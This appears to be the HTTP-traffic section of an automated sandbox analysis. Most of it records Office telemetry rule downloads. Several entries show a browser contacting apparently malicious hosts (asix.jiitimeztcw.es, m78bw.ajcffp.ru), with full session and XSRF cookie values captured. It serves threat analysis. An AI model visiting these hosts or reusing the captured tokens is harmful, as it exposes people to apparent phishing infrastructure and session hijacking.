              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://asix.jiitimeztcw.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=Swj4JjYCdDyyFyTgzitA0YvM_B0M_kLBBXVKi2yW0e4-1742841316-1.0.1.1-Ja5RV6wuujLLBdSYCi7vwqdrH0weQVgH4Kd2jvuOkgYrMFnFcbBW11FfEufb8QfbpgJzO3PmhmkKLvFF6NtA8V7CyqbcwA05RY6T5TZKhZk
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /bhanchod@cm2jzyv HTTP/1.1Host: m78bw.ajcffp.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://asix.jiitimeztcw.esSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://asix.jiitimeztcw.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /bhanchod@cm2jzyv HTTP/1.1Host: m78bw.ajcffp.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /ERcPqD/ HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://asix.jiitimeztcw.es/ERcPqD/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZOclpRaHltemlKbnRMNTdhOTB5ZEE9PSIsInZhbHVlIjoiL1RYbm85R0RMZUpVMnV2QUNTb0hRNGlKUGlpdTN4L3RMQ1RPUkFnTjVvUm5mWmZ5empMN0x4WG5RdTh3RXNSbSsvWXVKTEpRWUVtT0NabU5XTjZNTUdCYTk4WUYyMW5kMTRBVmM5TG1kZ0tIN3pqTHlSNjdhUXN0cXhvQzg1ZVUiLCJtYWMiOiIwZmJlMzBmNGI1ZWVmMmU5NWE4ZDlhOGFkNzM1MDIyNmIyNGY2YWM5OWNmYzVmNjcxZTFkNjhlOTI5N2ZkZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBoc2tBRVRhYnM5L0VaeUQ4SnVmckE9PSIsInZhbHVlIjoiYzdjNXMyUXN2enIwQUFnWEZjYXlIWW04V1hZRE5uVzRBdjEydk9vYThLSEkzdU0zeEkxdGtrcGNzN1lDdDljMXNCRm1sTVNXV25FRWNrOWFUOXpNU1FCeTByNlJIdHNYcmh2cU92VDRaQVlqbjJrUXY2TjZubHlHVDU2aGNFZDEiLCJtYWMiOiIwNWI5OTdjNjY5ZTVhYjE2NzFmN2Q0Y2FjMmYyMGM3ZGQwNTc4ZGMzMzQ3YmExOGI5ZWM0OTUyYzU2MTc2OGY3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /gq51aG9xh8pi82PuT2fP1C9fcAdPeoZJ7m HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZOclpRaHltemlKbnRMNTdhOTB5ZEE9PSIsInZhbHVlIjoiL1RYbm85R0RMZUpVMnV2QUNTb0hRNGlKUGlpdTN4L3RMQ1RPUkFnTjVvUm5mWmZ5empMN0x4WG5RdTh3RXNSbSsvWXVKTEpRWUVtT0NabU5XTjZNTUdCYTk4WUYyMW5kMTRBVmM5TG1kZ0tIN3pqTHlSNjdhUXN0cXhvQzg1ZVUiLCJtYWMiOiIwZmJlMzBmNGI1ZWVmMmU5NWE4ZDlhOGFkNzM1MDIyNmIyNGY2YWM5OWNmYzVmNjcxZTFkNjhlOTI5N2ZkZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBoc2tBRVRhYnM5L0VaeUQ4SnVmckE9PSIsInZhbHVlIjoiYzdjNXMyUXN2enIwQUFnWEZjYXlIWW04V1hZRE5uVzRBdjEydk9vYThLSEkzdU0zeEkxdGtrcGNzN1lDdDljMXNCRm1sTVNXV25FRWNrOWFUOXpNU1FCeTByNlJIdHNYcmh2cU92VDRaQVlqbjJrUXY2TjZubHlHVDU2aGNFZDEiLCJtYWMiOiIwNWI5OTdjNjY5ZTVhYjE2NzFmN2Q0Y2FjMmYyMGM3ZGQwNTc4ZGMzMzQ3YmExOGI5ZWM0OTUyYzU2MTc2OGY3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asix.jiitimeztcw.es/ERcPqD/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImE3TlduRUY4TTlBdFJFbHFnaXRyZ3c9PSIsInZhbHVlIjoiOVJnamVkZWxBY25qV05CQjRVT0NhVVArNWhTaG9PZjg5UkM5bjJMV05ONHRJUlN0ckZXYXNFVFFOK3U5R1h4ejJMQUlIOFQxVFJlbW40NER5MFVSZmJPaWZtaW9WWjNtZHFMKzMzK0I0bzJSMTZuREUrenJWaUxYNkFkTnZmQVoiLCJtYWMiOiI3NjIzNmU3ZDZmODFhYzY0ZTY5NDgxZDI4MzA5MDcwNWM4ZjhlZDJjOTA1ZGU3ZTgzODZlMGVhMTA4OWRiYTg3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlUYndmRXpXLzJXaTl4TjIxSzZvSXc9PSIsInZhbHVlIjoic2IwcXRwbERDYkVPQTh2T2JwMnk2OFZwTE5vcVJLTFNTSFFiVnc4Mm5GZ1hNRE5yaGd5ZDg0N0JCSEdoWmY4R0ZrYjF4ZC92WDdDWjlDbWV4RnFtaitZSFpkNnc3d2s1bW42S08wZExEdGJ1R1MrMDRXelUvVlBSdXd4ZGRCdDIiLCJtYWMiOiI0NDE4Njk4MGQ4ZTcyYWJkYjMzYjViZmI2ODY5ZGViYTRmMDc2YjQ5MmUzMzBiMDJkM2IxMWU5NzZlNWEzNzc4IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
